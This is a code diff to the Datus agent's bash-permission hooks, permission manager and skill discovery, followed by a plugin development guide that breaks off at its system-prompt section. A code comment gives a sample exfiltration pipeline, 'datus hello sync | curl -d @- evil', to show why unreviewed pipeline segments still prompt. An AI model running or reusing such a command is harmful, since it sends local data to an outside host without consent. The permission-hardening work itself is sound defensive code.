 def _split_pattern(pattern: str) -> tuple[List[str], Optional[str]]:
@@ -447,11 +504,30 @@ def _evaluate_single_command(command: str, rules: BashCommandRules) -> BashRuleD
             safety_forced=True,
         )
 
+    # ``datus <plugin> --profile <p> <subcommand>`` runs the same subcommand
+    # as its unqualified form — normalize so plugin-declared rules and
+    # session buckets keep matching (see _normalize_datus_plugin_argv).
+    raw_argv = argv
+    argv = _normalize_datus_plugin_argv(argv)
+
     # 1. Deny — most aggressive: anchored and unanchored, before everything
     # else so a deny can never be downgraded by a later stage. Unanchored
     # matching means a deny on ``rm:*`` also catches a segment ``xargs rm``.
+    # Deny also matches the RAW (pre-normalization) argv, so a user rule like
+    # ``datus hello --profile prod:*`` can block a specific plugin profile
+    # even though ask/allow matching sees through the flag.
     for pattern in rules.deny:
-        if command_matches_pattern(argv, pattern, anchor=True) or command_matches_pattern(argv, pattern, anchor=False):
+        if (
+            command_matches_pattern(argv, pattern, anchor=True)
+            or command_matches_pattern(argv, pattern, anchor=False)
+            or (
+                raw_argv is not argv
+                and (
+                    command_matches_pattern(raw_argv, pattern, anchor=True)
+                    or command_matches_pattern(raw_argv, pattern, anchor=False)
+                )
+            )
+        ):
             return BashRuleDecision(
                 level=PermissionLevel.DENY,
                 source=BashDecisionSource.DENY_RULE,
@@ -591,6 +667,7 @@ def _evaluate_pipeline(command: str, segments: List[str], rules: BashCommandRule
         reason=f"Pipeline requires confirmation: {rep.reason}",
         bucket=rep.bucket,
         safety_forced=False,
+        segment_ask_patterns=tuple((d.source, d.matched_pattern) for d in non_allow),
     )
 
 

--- a/datus/tools/permission/permission_hooks.py
+++ b/datus/tools/permission/permission_hooks.py
@@ -845,15 +845,17 @@ class PermissionHooks(AgentHooks):
 
         * DENY match → raise immediately, naming the matched pattern.
         * ALLOW match → bypass (no prompt).
-        * ASK → non-interactive raises; otherwise consult the optional LLM
-          classifier (reserved seam — never for ``safety_forced`` decisions),
-          then the per-bucket session cache, then prompt with four choices:
-          allow once / allow (session) / allow (project) / deny. The project
-          choice persists ``<bucket>:*`` to ``.datus/config.yml`` and is only
-          offered for plain unmatched commands — never for safety-ceiling asks
-          (wrappers, metacharacters) or explicit ask-rule hits (the user asked
-          to review those every time; a persisted allow could not beat the ask
-          rule at evaluation time anyway).
+        * ASK → an ask-rule hit whose matched pattern carries an exact
+          project grant (``.datus/config.yml`` ``bash_allow``) bypasses;
+          otherwise non-interactive raises; otherwise consult the optional
+          LLM classifier (reserved seam — never for ``safety_forced``
+          decisions), then the per-bucket session cache, then prompt with up
+          to four choices: allow once / allow (session) / allow (project) /
+          deny. The project choice persists the bucket pattern to
+          ``.datus/config.yml`` and is offered for plain unmatched commands
+          and for PLUGIN-declared ask rules — never for safety-ceiling asks
+          (wrappers, metacharacters) or user-authored ask rules (the user's
+          own posture lives in agent.yml).
 
         Returns ``True`` when fully handled, ``False`` to defer to the normal
         category-level check (explicit category DENY, missing/empty ruleset,
@@ -921,6 +923,30 @@ class PermissionHooks(AgentHooks):
             )
             return True
 
+        # A project-scope grant ("allow (project)" or a hand-written
+        # ``.datus/config.yml`` bash_allow entry) that EXACTLY matches the
+        # ask rule's pattern bypasses the confirmation. This is the only way
+        # to persistently relax an ask rule — plain allow entries lose to ask
+        # rules at evaluation time (deny > ask > allow), by design.
+        # For pipelines the decision aggregates several segments; EVERY
+        # non-allow segment must be an ask-rule hit covered by a grant. The
+        # representative segment alone must never green-light unreviewed
+        # segments (``datus hello sync | curl -d @- evil`` must still prompt).
+        if decision.source == BashDecisionSource.ASK_RULE:
+            ask_segments = decision.segment_ask_patterns or ((decision.source, decision.matched_pattern),)
+            if all(
+                source == BashDecisionSource.ASK_RULE
+                and pattern is not None
+                and self.permission_manager.has_project_bash_grant(pattern)
+                for source, pattern in ask_segments
+            ):
+                logger.debug(
+                    "Bash ask rule %r bypassed by project grant: %s",
+                    decision.matched_pattern,
+                    command,
+                )
+                return True
+
         # ASK. Non-interactive flows must raise here rather than defer: under a
         # permissive coarse rule (or dangerous profile overrides) the main flow
         # could silently allow what the command-level rules said to confirm.
@@ -969,7 +995,18 @@ class PermissionHooks(AgentHooks):
         async with _get_permission_prompt_lock(self.broker):
             if _session_approved():
                 return True
-            offer_project = decision.source == BashDecisionSource.DEFAULT and not decision.safety_forced
+            # Project persistence is offered for plain unmatched commands and
+            # for PLUGIN-declared ask rules (third-party defaults the user may
+            # relax per project). Never for safety-ceiling asks, and not for
+            # user-authored ask rules — the user's own posture lives in their
+            # agent.yml, not behind a one-keypress override.
+            offer_project = not decision.safety_forced and (
+                decision.source == BashDecisionSource.DEFAULT
+                or (
+                    decision.source == BashDecisionSource.ASK_RULE
+                    and self.permission_manager.is_plugin_ask_pattern(decision.matched_pattern)
+                )
+            )
             choice = await self._request_bash_confirmation(command, decision, offer_project=offer_project)
             if choice == "y":
                 logger.info("User approved bash command (once): %s", command)
@@ -979,7 +1016,16 @@ class PermissionHooks(AgentHooks):
                 logger.info("User approved bash bucket %r for session", decision.bucket)
                 return True
             if choice == "p" and offer_project:
-                pattern = self._bucket_to_allow_pattern(decision.bucket)
+                # Ask-rule hits persist the EXACT matched pattern: the grant
+                # bypass above checks strict equality with matched_pattern, so
+                # suffixing ``:*`` onto a colon-free (exact) plugin pattern
+                # would persist a grant that never fires. Unmatched (DEFAULT)
+                # commands keep the prefix-widened bucket pattern, which takes
+                # effect through allow-rule evaluation instead.
+                if decision.source == BashDecisionSource.ASK_RULE and decision.matched_pattern:
+                    pattern = decision.matched_pattern
+                else:
+                    pattern = self._bucket_to_allow_pattern(decision.bucket)
                 persisted = self.permission_manager.add_project_bash_allow(pattern, self.project_root)
                 # Session bucket too, so later same-bucket calls this session
                 # skip the prompt even though global_config already allows them.

--- a/datus/tools/permission/permission_manager.py
+++ b/datus/tools/permission/permission_manager.py
@@ -18,6 +18,7 @@ from datus.tools.permission.profiles import get_profile
 
 if TYPE_CHECKING:
     from datus.tools.func_tool.base import Tool
+    from datus.tools.permission.bash_rules import BashCommandRules
 
 logger = logging.getLogger(__name__)
 
@@ -52,6 +53,8 @@ class PermissionManager:
         global_config: Optional[PermissionConfig] = None,
         node_overrides: Optional[Dict[str, PermissionConfig]] = None,
         active_profile: str = "normal",
+        plugin_bash_rules: Optional[Dict[str, "BashCommandRules"]] = None,
+        project_bash_allows: Optional[List[str]] = None,
     ):
         """Initialize the permission manager.
 
@@ -64,6 +67,17 @@ class PermissionManager:
                 baked into ``global_config`` are authoritative; this string
                 is what the status bar displays and what :meth:`switch_profile`
                 mutates. Defaults to ``"normal"``.
+            plugin_bash_rules: Per-profile bash rules declared by installed
+                plugins (``AgentConfig.plugin_bash_rules``). NOT applied at
+                init — the incoming ``global_config`` already carries the
+                active profile's plugin rules — but kept so
+                :meth:`switch_profile` can re-apply them for the new profile.
+            project_bash_allows: Patterns granted at project scope
+                (``./.datus/config.yml`` ``bash_allow``). Besides riding the
+                normal allow-list merge, these are kept as an exact-match
+                grant set that lets the hook bypass an *ask-rule* hit whose
+                matched pattern the project explicitly allowed — plain allow
+                entries cannot beat ask rules at evaluation time.
         """
         # Copy the incoming config — ``get_profile`` returns shared module-level
         # objects, and ``add_persistent_rule`` mutates ``global_config.rules``
@@ -87,6 +101,17 @@ class PermissionManager:
         # rebuilds ``global_config`` so the grant survives a /permission
         # switch (the on-disk ``.datus/config.yml`` copy covers restarts).
         self._persistent_bash_allows: List[str] = []
+
+        # Per-profile plugin-declared bash rules, re-applied on every
+        # ``switch_profile`` rebuild (a rebuild starts from the bare profile
+        # singleton and would silently drop them otherwise).
+        self._plugin_bash_rules: Dict[str, "BashCommandRules"] = dict(plugin_bash_rules or {})
+
+        # Exact-match project grants (``.datus/config.yml`` bash_allow, plus
+        # anything granted via "allow (project)" this session). Consulted by
+        # the hook to bypass ask-rule hits the project explicitly allowed;
+        # unaffected by profile switches — the on-disk grant is user intent.
+        self._project_bash_grants: set = set(project_bash_allows or [])
 
         logger.debug(
             f"PermissionManager initialized: profile={self.active_profile}, "
@@ -365,6 +390,7 @@ class PermissionManager:
         self._install_bash_allow(pattern)
         if pattern not in self._persistent_bash_allows:
             self._persistent_bash_allows.append(pattern)
+        self._project_bash_grants.add(pattern)
 
         try:
             from datus.configuration.project_config import append_project_bash_allow
@@ -375,6 +401,30 @@ class PermissionManager:
         except Exception as e:
             logger.warning(f"Failed to persist project bash allow {pattern!r}: {e}; grant applies to this session only")
             return False
+
+    def has_project_bash_grant(self, pattern: Optional[str]) -> bool:
+        """True when ``pattern`` was granted at project scope (exact match).
+
+        Used by the hook to let a project grant bypass an ask-rule hit: the
+        grant string is the matched pattern itself, so equality — not glob
+        matching — is the contract. A broader hand-written allow never
+        silences a narrower ask rule.
+        """
+        return bool(pattern) and pattern in self._project_bash_grants
+
+    def is_plugin_ask_pattern(self, pattern: Optional[str]) -> bool:
+        """True when ``pattern`` is an ask rule declared by a plugin for the
+        active profile.
+
+        The confirmation prompt offers "allow (project)" for these — a plugin
+        ask is a third-party default the user may relax per project — but not
+        for ask rules the user wrote in agent.yml (those are the user's own
+        explicit posture; relaxing them belongs in their config).
+        """
+        if not pattern:
+            return False
+        plugin_rules = self._plugin_bash_rules.get(self.active_profile)
+        return plugin_rules is not None and pattern in plugin_rules.ask
 
     def switch_profile(
         self,
@@ -419,6 +469,13 @@ class PermissionManager:
         for rule in self._persistent_rules:
             if not any(r.tool == rule.tool and r.pattern == rule.pattern for r in self.global_config.rules):
                 self.global_config.rules.insert(0, rule)
+        # Re-apply plugin-declared bash rules for the new profile — a rebuild
+        # starts from the bare profile singleton, which never carries them.
+        # Same ``bash_commands is not None`` guard as below: ``dangerous``
+        # intentionally has no command-level ruleset and stays fully open.
+        plugin_rules = self._plugin_bash_rules.get(profile_name)
+        if plugin_rules is not None and self.global_config.bash_commands is not None:
+            self.global_config.bash_commands = self.global_config.bash_commands.merge_with(plugin_rules)
         # Re-apply project-scope bash allows granted earlier this session —
         # but only when the rebuilt config already carries a command-level
         # ruleset. Installing one where the profile intentionally left

--- a/datus/tools/permission/profiles.py
+++ b/datus/tools/permission/profiles.py
@@ -386,6 +386,7 @@ def build_user_overrides(
 def build_effective_config(
     profile_name: str,
     user_raw: Optional[dict] = None,
+    plugin_bash_rules: Optional[BashCommandRules] = None,
 ) -> PermissionConfig:
     """Build the effective permission config for a profile + user overrides.
 
@@ -404,12 +405,27 @@ def build_effective_config(
             unknown names.
         user_raw: The raw user permissions dict (without the ``profile``
             key). ``None`` or ``{}`` yields the bare profile base.
+        plugin_bash_rules: Bash rules declared by installed plugins for this
+            profile (``collect_plugin_cli_permissions()[profile_name]``).
+            Layered between the profile base and the user rules: since
+            ``evaluate_bash_command`` applies deny > safety > ask > allow
+            regardless of list order, a plugin ``allow`` can never override a
+            user ``deny``. Ignored when the profile carries no
+            ``bash_commands`` ruleset (dangerous stays fully open).
 
     Returns:
         The merged ``PermissionConfig`` ready to install on
         ``AgentConfig.permissions_config`` and ``PermissionManager.global_config``.
     """
     base = get_profile(profile_name)
+    if plugin_bash_rules is not None and not plugin_bash_rules.is_empty() and base.bash_commands is not None:
+        # Rebuild instead of mutating: ``get_profile`` returns shared
+        # module-level singletons.
+        base = PermissionConfig(
+            default_permission=base.default_permission,
+            rules=list(base.rules),
+            bash_commands=base.bash_commands.merge_with(plugin_bash_rules),
+        )
     if not user_raw:
         return base
 

--- a/datus/tools/proxy/proxy_tool.py
+++ b/datus/tools/proxy/proxy_tool.py
@@ -148,12 +148,15 @@ def apply_proxy_tools(
 # ── Internal helpers ─────────────────────────────────────────────────
 
 
-def _parse_patterns(patterns: List[str]) -> List[Tuple[Optional[str], str]]:
+def parse_tool_patterns(patterns: List[str]) -> List[Tuple[Optional[str], str]]:
     """Parse ``"category.method_glob"`` patterns into ``(category, method_glob)`` tuples.
 
     - ``"filesystem_tools.*"``  → ``("filesystem_tools", "*")``
     - ``"read_file"``           → ``(None, "read_file")``
     - ``"*"``                   → ``(None, "*")``
+
+    Public API shared with the tool middleware so both the proxy and the
+    transformer layers speak one pattern syntax.
     """
     result: List[Tuple[Optional[str], str]] = []
     for p in patterns:
@@ -165,8 +168,11 @@ def _parse_patterns(patterns: List[str]) -> List[Tuple[Optional[str], str]]:
     return result
 
 
-def _matches(tool_name: str, registry: Dict[str, str], patterns: List[Tuple[Optional[str], str]]) -> bool:
-    """Check if a tool name matches any of the parsed patterns."""
+def tool_name_matches(tool_name: str, registry: Dict[str, str], patterns: List[Tuple[Optional[str], str]]) -> bool:
+    """Check if a tool name matches any of the parsed patterns.
+
+    Public API shared with the tool middleware (see :func:`parse_tool_patterns`).
+    """
     category = registry.get(tool_name)
 
     for pat_cat, pat_method in patterns:
@@ -180,3 +186,10 @@ def _matches(tool_name: str, registry: Dict[str, str], patterns: List[Tuple[Opti
                 return True
 
     return False
+
+
+# Backward-compatible private aliases: existing in-module call sites and the
+# proxy unit tests reference these names. New callers should use the public
+# ``parse_tool_patterns`` / ``tool_name_matches`` above.
+_parse_patterns = parse_tool_patterns
+_matches = tool_name_matches

--- a/datus/tools/skill_tools/skill_config.py
+++ b/datus/tools/skill_tools/skill_config.py
@@ -48,17 +48,112 @@ def _builtin_skills_dir() -> Optional[str]:
         return None
 
 
-def _default_skill_directories() -> List[str]:
-    """Default scan order: project override → user override → packaged built-ins.
+def _entry_point_skill_directories() -> List[str]:
+    """Discover skill directories contributed by adapter packages.
 
-    The first two entries match the documented user-facing locations. The
-    packaged directory is appended last so users can always shadow a built-in
-    skill by dropping a same-named SKILL.md into ``./.datus/skills`` or
-    ``~/.datus/skills`` (first-wins semantics in :class:`SkillRegistry`).
+    Adapter packages (e.g. ``datus-hello``) expose a bundled skill
+    directory through the ``datus.skills`` entry-point group. Each entry point
+    loads to either a string/``Path`` directory or a zero-arg callable that
+    returns one. Every failure is swallowed — skill discovery must never block
+    startup — and only existing directories are returned.
+    """
+    found: List[str] = []
+    try:
+        # Lazy import to avoid a cycle; the registry owns the one shared
+        # py3.10 ``select`` / pre-3.10 dict-fallback compatibility shim.
+        from datus.plugins.registry import entry_points_for_group
+
+        candidates = entry_points_for_group("datus.skills")
+    except Exception as exc:  # noqa: BLE001 - defensive: never break import
+        logger.debug("datus.skills entry-point lookup failed: %s", exc)
+        return found
+
+    for ep in candidates:
+        try:
+            obj = ep.load()
+            value = obj() if callable(obj) else obj
+            candidate = str(value)
+            if Path(candidate).expanduser().is_dir() and not _contains_directory(found, candidate):
+                found.append(candidate)
+        except Exception as exc:  # noqa: BLE001 - one bad adapter must not break discovery
+            logger.debug("datus.skills entry point %r failed to resolve: %s", getattr(ep, "name", ep), exc)
+    return found
+
+
+def _plugins_system_enabled() -> bool:
+    """Whether the datus-plugin system is enabled in the loaded agent config.
+
+    ``agent.plugins_enabled: false`` is the master switch that disables all
+    plugin functionality, including plugin-bundled skills. This reads the
+    already-loaded ``ConfigurationManager`` singleton (never triggers a config
+    load) because ``SkillConfig`` may be constructed without an ``AgentConfig``
+    in reach (default factory, ``skill_cli``). Defaults to enabled when no
+    config has been loaded yet (e.g. unit tests building SkillConfig directly).
+    """
+    try:
+        from datus.configuration import agent_config_loader
+
+        # Same coercion as ``AgentConfig.plugins_enabled`` so the two readers
+        # of this key can never disagree on a value like ``"off"``.
+        from datus.configuration.agent_config import _coerce_bool  # noqa: PLC2701
+
+        mgr = agent_config_loader.CONFIGURATION_MANAGER
+        if mgr is None:
+            return True
+        value = mgr.data.get("plugins_enabled")
+    except Exception as exc:  # noqa: BLE001 - defensive: never break discovery
+        logger.debug("plugins_enabled lookup failed: %s", exc)
+        return True
+    return _coerce_bool(value, True)
+
+
+def _plugin_skill_directories() -> List[str]:
+    """Skill directories contributed by ``datus.plugins`` packages.
+
+    Delegates to :func:`datus.plugins.registry.plugin_skill_directories` (lazy
+    import to avoid an import cycle). Returns an empty list when the plugin
+    system is disabled (``agent.plugins_enabled: false``). Any failure resolves
+    to an empty list so skill discovery never blocks startup.
+    """
+    if not _plugins_system_enabled():
+        return []
+    try:
+        from datus.plugins.registry import plugin_skill_directories
+
+        return plugin_skill_directories()
+    except Exception as exc:  # noqa: BLE001 - defensive: never break discovery
+        logger.debug("plugin skill-directory discovery failed: %s", exc)
+        return []
+
+
+def _adapter_skill_directories() -> List[str]:
+    """Directories contributed by plugins (``datus.plugins``) then legacy
+    adapters (``datus.skills``), de-duplicated with plugins taking precedence."""
+    dirs: List[str] = []
+    for ep_dir in _plugin_skill_directories():
+        if not _contains_directory(dirs, ep_dir):
+            dirs.append(ep_dir)
+    for ep_dir in _entry_point_skill_directories():
+        if not _contains_directory(dirs, ep_dir):
+            dirs.append(ep_dir)
+    return dirs
+
+
+def _default_skill_directories() -> List[str]:
+    """Default scan order: project → user → plugin/adapter entry points → packaged built-ins.
+
+    The first two entries match the documented user-facing locations and always
+    win (first-wins semantics in :class:`SkillRegistry`). Contributed
+    directories — plugins (``datus.plugins``) then legacy adapters
+    (``datus.skills``) — come next so an installed plugin can shadow a stale
+    built-in, but never a user override. The packaged directory is appended last.
     """
     dirs: List[str] = ["./.datus/skills", "~/.datus/skills"]
+    for ep_dir in _adapter_skill_directories():
+        if not _contains_directory(dirs, ep_dir):
+            dirs.append(ep_dir)
     builtin = _builtin_skills_dir()
-    if builtin and builtin not in dirs:
+    if builtin and not _contains_directory(dirs, builtin):
         dirs.append(builtin)
     return dirs
 
@@ -130,14 +225,18 @@ class SkillConfig(BaseModel):
         if not data:
             return cls()
 
-        # Always append the packaged built-ins to whatever the user listed so
-        # a deployer can never accidentally drop first-party skills (e.g.
-        # ``init``) by overriding ``skills.directories`` in agent.yml.
+        # Always append plugin/adapter-contributed (entry-point) and packaged
+        # built-in directories to whatever the user listed so a deployer can
+        # never accidentally drop first-party, plugin, or adapter skills (e.g.
+        # ``init``, ``hello``) by overriding ``skills.directories`` in agent.yml.
         directories = data.get("directories")
         if directories is None:
             directories = _default_skill_directories()
         else:
             directories = list(directories)
+            for ep_dir in _adapter_skill_directories():
+                if not _contains_directory(directories, ep_dir):
+                    directories.append(ep_dir)
             builtin = _builtin_skills_dir()
             if builtin and not _contains_directory(directories, builtin):
                 directories.append(builtin)

--- a/docs/plugin/development.md
+++ b/docs/plugin/development.md
@@ -1,0 +1,700 @@
+# Plugin Development
+
+This guide shows how to build a Datus plugin, from a minimal working `hello`
+command to the full contract. For what plugins are, how users install and
+configure them, and how profiles are resolved, start with the
+[introduction](introduction.md).
+
+A plugin is an installable Python package discovered through the
+`datus.plugins` entry-point group. The defining constraint: **a plugin never
+imports `datus.*` and depends on no shared SDK**. The contract is a small set
+of method names that Datus calls by structure (duck typing). Datus is the
+*config broker* — it reads `agent.yml`, expands `${VAR}` references, resolves
+the active profile, constructs your plugin with a plain `dict`, and calls it.
+You just implement the methods.
+
+## Prerequisites
+
+- A Python package you can install into the same environment as `datus`.
+- `datus` installed (`pip install datus-agent` or a source checkout).
+- Python 3.12+ — a plugin runs inside datus' own interpreter
+  (`datus-agent` declares `requires-python >= 3.12`), so your code and
+  dependencies must be compatible with it.
+
+## Quickstart: a minimal plugin
+
+A plugin is one class registered under `datus.plugins`. Here is the smallest
+useful example — a `hello` command.
+
+**1. Package layout**
+
+```
+datus-plugin-hello/
+├── pyproject.toml
+└── datus_plugin_hello/
+    ├── __init__.py
+    └── plugin.py
+```
+
+**2. The plugin class** (`datus_plugin_hello/plugin.py`)
+
+```python
+from __future__ import annotations
+
+from typing import Any, Dict, List, Optional
+
+
+class HelloPlugin:
+    def __init__(self, profile: Optional[Dict[str, Any]] = None) -> None:
+        # `profile` is the resolved agent.plugins.hello.<profile> dict
+        # (already ${VAR}-expanded by datus). Empty dict is fine.
+        self.profile: Dict[str, Any] = profile or {}
+
+    def run_cli(self, argv: List[str]) -> int:
+        greeting = self.profile.get("greeting", "Hello")
+        name = argv[0] if argv else "world"
+        print(f"{greeting}, {name}!")
+        return 0
+```
+
+**3. Register the entry point** (`pyproject.toml`)
+
+```toml
+[project]
+name = "datus-plugin-hello"
+version = "0.1.0"
+dependencies = []                      # note: NOT datus
+
+[project.entry-points."datus.plugins"]
+hello = "datus_plugin_hello.plugin:HelloPlugin"
+```
+
+The entry-point name (`hello`) alone determines the CLI command
+(`datus hello`) and the config key (`agent.plugins.hello`) — the class and
+module names are free. Two names are **reserved** and never dispatched to
+plugins: `upgrade` and `skill`. A plugin registered under either is silently
+unreachable, and names starting with `-` cannot be dispatched at all.
+
+**4. Install and run**
+
+```bash
+pip install -e datus-plugin-hello
+datus hello Ada          # -> Hello, Ada!
+```
+
+That is a complete plugin. Everything below is optional surface area.
+
+## The contract
+
+Datus calls these members **by name** on the class the entry point resolves to.
+Your class does not import or subclass anything from Datus.
+
+| Member | Kind | Purpose |
+|---|---|---|
+| `PluginClass(profile: dict)` | constructor | Datus passes the resolved `agent.plugins.<name>.<profile>` dict (env-expanded) as a **keyword argument** — `PluginClass(profile=...)` — so the parameter must be named `profile`. A config-free plugin may ignore its value. |
+| `run_cli(self, argv: list[str]) -> int \| None` | instance method | Runs the subcommand. `argv` is everything after `datus <plugin>`, with Datus' own `--profile` / `--config` already stripped. Return an exit code; `None` means `0`. |
+| `skills_dir() -> str \| None` | **optional**, class-level | Returns the bundled skill directory. See [Bundling skills](#bundling-skills). |
+| `system_prompt(profiles: dict[str, dict]) -> str \| None` | **optional**, class-level | Returns a markdown block injected into the agent's system prompt. See [System-prompt injection](#system-prompt-injection). |
+| `cli_permissions() -> dict \| None` | **optional**, class-level | Declares bash-permission rules for the plugin's own CLI namespace, per permission profile. See [CLI bash permissions](#cli-bash-permissions). |
+| `tool_transformers() -> dict \| None` | **optional**, class-level | Declares tool argument transformers that rewrite or deny the agent's tool calls before execution. See [Tool argument transformers](#tool-argument-transformers). |
+
+!!! warning "`skills_dir` and `system_prompt` must be class-reachable"
+    Datus resolves both **at startup, without an active profile** (skill
+    discovery and prompt building happen before any command runs). Declare them
+    as `@classmethod` / `@staticmethod` (or a plain class attribute for
+    `skills_dir`) — they must not depend on `__init__`.
+
+## Configuration: what Datus hands you
+
+Users configure your plugin under `agent.plugins.<name>`, where each key below
+`<name>` is a **profile** (an environment):
+
+```yaml
+agent:
+  plugins:
+    hello:
+      prod:
+        default: true
+        greeting: Hi
+        token: ${HELLO_TOKEN}      # prefer ${ENV_VAR} for secrets
+      staging:
+        greeting: Yo
+```
+
+Datus parses this into `agent.plugins.<name>.<profile> -> dict`, **expands
+`${VAR}` per profile**, and injects a `name` key equal to the profile name.
+Which profile dict reaches your constructor is decided by Datus — explicit
+`--profile`, project pin, `default: true`, sole profile, or an empty dict
+when nothing is configured. The full resolution order is documented in the
+[introduction](introduction.md#which-profile-runs); you never write any of
+that logic. Your constructor simply receives the resolved `dict`.
+
+When testing locally, put your profile in whichever config file your datus
+session actually loads (explicit `--config` → `./conf/agent.yml` →
+`~/.datus/conf/agent.yml`).
+
+## Implementing `run_cli`
+
+`argv` is the command tail with Datus' global flags removed:
+
+```
+datus hello --profile staging greet Ada
+                └── stripped ──┘ └── argv = ["greet", "Ada"] ──┘
+```
+
+Only `--profile` / `--config` appearing **before the first non-option token**
+are consumed as Datus globals; from the first command token onward everything
+belongs to the plugin. `datus hello greet --profile staging` therefore passes
+`["greet", "--profile", "staging"]` through untouched — your subcommands are
+free to define their own `--profile` option.
+
+Return an integer exit code. Suggested conventions:
+
+| Code | Meaning |
+|---|---|
+| `0` | success |
+| `1` | runtime error |
+| `2` | usage error |
+| `3` | config error |
+| `8` | missing optional dependency |
+
+Raising is also fine — Datus catches exceptions from `run_cli` and maps them to
+exit code `1` rather than crashing the CLI — but returning an explicit code
+gives users clearer signals.
+
+## Recipes: wrapping functions and APIs into a CLI
+
+`run_cli` receives a raw `argv` list, so you are free to route it however you
+like. Here are four common patterns, from quickest to richest.
+
+### A. Dict dispatch — a few functions, zero dependencies
+
+The fastest way to expose a handful of functions. Map the first token to a
+handler; each handler gets the rest of `argv`.
+
+```python
+class ToolboxPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        if not argv:
+            print("usage: datus toolbox <add|upper> ...")
+            return 2
+        cmd, rest = argv[0], argv[1:]
+        handlers = {"add": self._add, "upper": self._upper}
+        handler = handlers.get(cmd)
+        if handler is None:
+            print(f"unknown command: {cmd}")
+            return 2
+        return handler(rest)
+
+    def _add(self, args):          # datus toolbox add 1 2 3
+        print(sum(float(a) for a in args))
+        return 0
+
+    def _upper(self, args):        # datus toolbox upper hello
+        print(" ".join(args).upper())
+        return 0
+```
+
+### B. argparse — typed args, flags, auto usage/`-h`
+
+Stdlib, no extra dependency. `argparse` prints usage and raises `SystemExit`
+on `-h` or a bad invocation; Datus surfaces that as the exit code (0 for `-h`,
+2 for usage errors), which is the conventional CLI behavior.
+
+```python
+import argparse
+
+class ToolboxPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        parser = argparse.ArgumentParser(prog="datus toolbox")
+        sub = parser.add_subparsers(dest="cmd", required=True)
+
+        p_add = sub.add_parser("add", help="sum numbers")
+        p_add.add_argument("nums", nargs="+", type=float)
+
+        p_grep = sub.add_parser("grep", help="filter lines in a file")
+        p_grep.add_argument("pattern")
+        p_grep.add_argument("path")
+        p_grep.add_argument("-i", "--ignore-case", action="store_true")
+
+        ns = parser.parse_args(argv)      # SystemExit on -h / bad usage
+        if ns.cmd == "add":
+            print(sum(ns.nums))
+            return 0
+        if ns.cmd == "grep":
+            return self._grep(ns.pattern, ns.path, ns.ignore_case)
+
+    def _grep(self, pattern, path, ignore_case):
+        needle = pattern.lower() if ignore_case else pattern
+        with open(path, encoding="utf-8") as fh:
+            for line in fh:
+                hay = line.lower() if ignore_case else line
+                if needle in hay:
+                    print(line.rstrip())
+        return 0
+```
+
+### C. Wrapping a REST API
+
+Read the endpoint and credentials from the profile (Datus already expanded
+`${VAR}`), then map subcommands to requests. Keep credentials in the profile —
+never hard-code them, and never echo them.
+
+```python
+import argparse
+import json
+
+class PetstorePlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        import requests  # a plugin may depend on its own libraries
+
+        base = self.profile.get("api_base_url")
+        if not base:
+            print("no api_base_url configured for the profile")
+            return 3
+        headers = {}
+        if self.profile.get("token"):
+            headers["Authorization"] = f"Bearer {self.profile['token']}"
+
+        parser = argparse.ArgumentParser(prog="datus petstore")
+        sub = parser.add_subparsers(dest="cmd", required=True)
+        sub.add_parser("list-pets")
+        p_get = sub.add_parser("get-pet")
+        p_get.add_argument("id")
+        ns = parser.parse_args(argv)
+
+        base = base.rstrip("/")
+        if ns.cmd == "list-pets":
+            resp = requests.get(f"{base}/pets", headers=headers, timeout=30)
+        else:
+            resp = requests.get(f"{base}/pets/{ns.id}", headers=headers, timeout=30)
+
+        if resp.status_code >= 400:
+            print(f"error {resp.status_code}: {resp.text}")
+            return 1
+        print(json.dumps(resp.json(), indent=2))
+        return 0
+```
+
+Corresponding config:
+
+```yaml
+agent:
+  plugins:
+    petstore:
+      prod:
+        default: true
+        api_base_url: https://api.example.com/v1
+        token: ${PETSTORE_TOKEN}
+```
+
+### D. Typer / Click — richest UX, one extra dependency
+
+For a large command surface, a framework like [Typer](https://typer.tiangolo.com/)
+gives you help text, type coercion, and completion. Because Datus constructs
+your plugin per-invocation but the Typer app is a module-level object, expose
+the active profile through a module global that commands read.
+
+```python
+import typer
+
+app = typer.Typer(add_completion=False)
+_ACTIVE_PROFILE: dict = {}
+
+
+@app.command("greet")
+def greet(name: str, loud: bool = False):
+    greeting = _ACTIVE_PROFILE.get("greeting", "Hello")
+    msg = f"{greeting}, {name}!"
+    print(msg.upper() if loud else msg)
+
+
+class GreeterPlugin:
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    def run_cli(self, argv):
+        global _ACTIVE_PROFILE
+        _ACTIVE_PROFILE = self.profile
+        try:
+            # standalone_mode=False stops Click from calling sys.exit itself,
+            # so we can return a code and always clear the profile.
+            app(args=argv, standalone_mode=False)
+            return 0
+        except SystemExit as exc:      # -h / usage
+            return int(exc.code or 0)
+        except typer.Exit as exc:
+            return exc.exit_code
+        finally:
+            _ACTIVE_PROFILE = {}
+```
+
+Add `typer` to your package's `dependencies` (your plugin's deps are its own —
+just not `datus`).
+
+## Bundling skills
+
+If your package ships a skill directory, expose it via a class-level
+`skills_dir()` and Datus will discover the skills at startup (they show up in
+`/skill list`, alongside project and user skills).
+
+```python
+class HelloPlugin:
+    @classmethod
+    def skills_dir(cls) -> str:
+        from pathlib import Path
+        return str(Path(__file__).parent / "skills")
+```
+
+Layout and packaging:
+
+```
+datus_plugin_hello/
+└── skills/
+    └── hello/
+        └── SKILL.md
+```
+
+A minimal `SKILL.md` is YAML frontmatter plus markdown instructions (the
+frontmatter follows the [agentskills.io](https://agentskills.io) spec used by
+the Skills system):
+
+```markdown
+---
+name: hello
+description: Say hello to someone via the `datus hello` CLI
+---
+
+# Hello
+
+Run `datus hello <name>` to greet someone. ...
+```
+
+See the [Skills](../skills/introduction.md) docs for the full frontmatter
+field reference.
+
+Make sure the skill files are included in the wheel (they are data, not
+Python). Hatchling packages every file under the package directory by default,
+so nothing extra is needed unless the files are VCS-ignored (then list them
+under `[tool.hatch.build.targets.wheel] artifacts`). With setuptools you must
+opt in explicitly:
+
+```toml
+[tool.setuptools.package-data]
+datus_plugin_hello = ["skills/**/*"]
+```
+
+After building, verify with `unzip -l dist/*.whl | grep SKILL.md`.
+
+## System-prompt injection
+
+A plugin can tell the agent, up front, what it is and which environments are
+configured — so the model chooses it proactively instead of guessing. Expose a
+class-level `system_prompt(profiles)`:
+
+```python
+class HelloPlugin:
+    @classmethod
+    def system_prompt(cls, profiles):
